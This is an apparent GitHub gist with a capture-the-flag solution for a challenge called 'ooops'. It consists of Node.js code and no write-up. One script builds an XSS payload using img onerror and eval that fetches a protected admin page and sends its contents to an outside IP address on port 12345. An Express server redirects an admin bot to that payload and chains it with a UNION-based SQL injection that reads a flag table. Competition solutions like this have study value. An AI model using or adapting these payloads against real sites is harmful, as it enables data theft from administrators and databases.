Created
May 13, 2019 00:20
-
-
Save bluepichu/48cf86e35fe69e75d51fb73c6af9a74c to your computer and use it in GitHub Desktop.
ooops solution (PPP)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function generate(host, path) { | |
| let out = ""; | |
| // let outscript = ` | |
| // <img src='no' onerror='eval(" | |
| // function fetch(url, cb) { | |
| // var xhr = new XMLHttpRequest(); | |
| // xhr.open(\\"GET\\", url); | |
| // xhr.send(); | |
| // xhr.onerror = function(err) { | |
| // fetch(\\"http://128.237.164.193:12345/err\\", cb); | |
| // }; | |
| // xhr.onload = function() { | |
| // cb(xhr.response); | |
| // }; | |
| // }; | |
| // window.location.href= | |
| // \\"http://128.237.164.193:12345/?x=\\" | |
| // +encodeURIComponent(document.body.innerHTML); | |
| // ") | |
| // ` | |
| let pathParts = []; | |
| while (path.length > 0) { | |
| pathParts.push(`\\"` + path.substring(0, 20).replace(/'/g, "\\x27") + `\\"`); | |
| path = path.substring(20); | |
| } | |
| let outscript = ` | |
| <img src='no' onerror='eval(" | |
| function fetch(url, cb) { | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open(\\"GET\\", url); | |
| xhr.send(); | |
| xhr.onerror = function(err) { | |
| fetch(\\"http://128.237.164.193:12345/err\\", cb); | |
| }; | |
| xhr.onload = function() { | |
| cb(xhr.response); | |
| }; | |
| }; | |
| fetch( | |
| ${pathParts.join("\n+")} | |
| , | |
| function(f){ | |
| fetch(\\"http://128.237.164.193:12345/\\" | |
| +encodeURIComponent(f), | |
| function(){}); | |
| }); | |
| ") | |
| `; | |
| console.log(outscript); | |
| out = " ".repeat(31 + "http://xyz.oooverflow.io/".length - host.length); | |
| let lines = outscript.split("\n"); | |
| out += | |
| lines | |
| .filter((ln) => ln !== "") | |
| .map((ln, i) => { | |
| ln += " ".repeat(51 - ln.length); | |
| if (i == 0) { | |
| return ` ${ln}/*`; | |
| } else { | |
| return `*/${ln}/*`; | |
| } | |
| }) | |
| .join(""); | |
| out += "*/'/>" | |
| // console.log(out); | |
| // console.log("-----"); | |
| // console.log(encodeURIComponent(out)); | |
| return encodeURIComponent(out); | |
| } | |
| module.exports = { generate }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const express = require("express"); | |
| const morgan = require("morgan"); | |
| const { generate } = require("./generate-script"); | |
| const app = express(); | |
| app.use(morgan("dev")); | |
| app.get("/", (req, res) => { | |
| let url = new URL(req.headers.referer); | |
| let base = url.origin + "/oooverflow.io?"; | |
| let data = base + generate(base, "/admin/view/" + encodeURIComponent("-1 union select 1,flag,'b','c','d' from flag")); | |
| console.log("-->", data); | |
| res.redirect(data); | |
| }); | |
| app.listen(5555, () => console.log("Listening on :5555")); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "ooops", | |
| "version": "1.0.0", | |
| "description": "", | |
| "main": "index.js", | |
| "scripts": { | |
| "test": "echo \"Error: no test specified\" && exit 1" | |
| }, | |
| "author": "", | |
| "license": "ISC", | |
| "dependencies": { | |
| "express": "^4.16.4", | |
| "morgan": "^1.9.1" | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment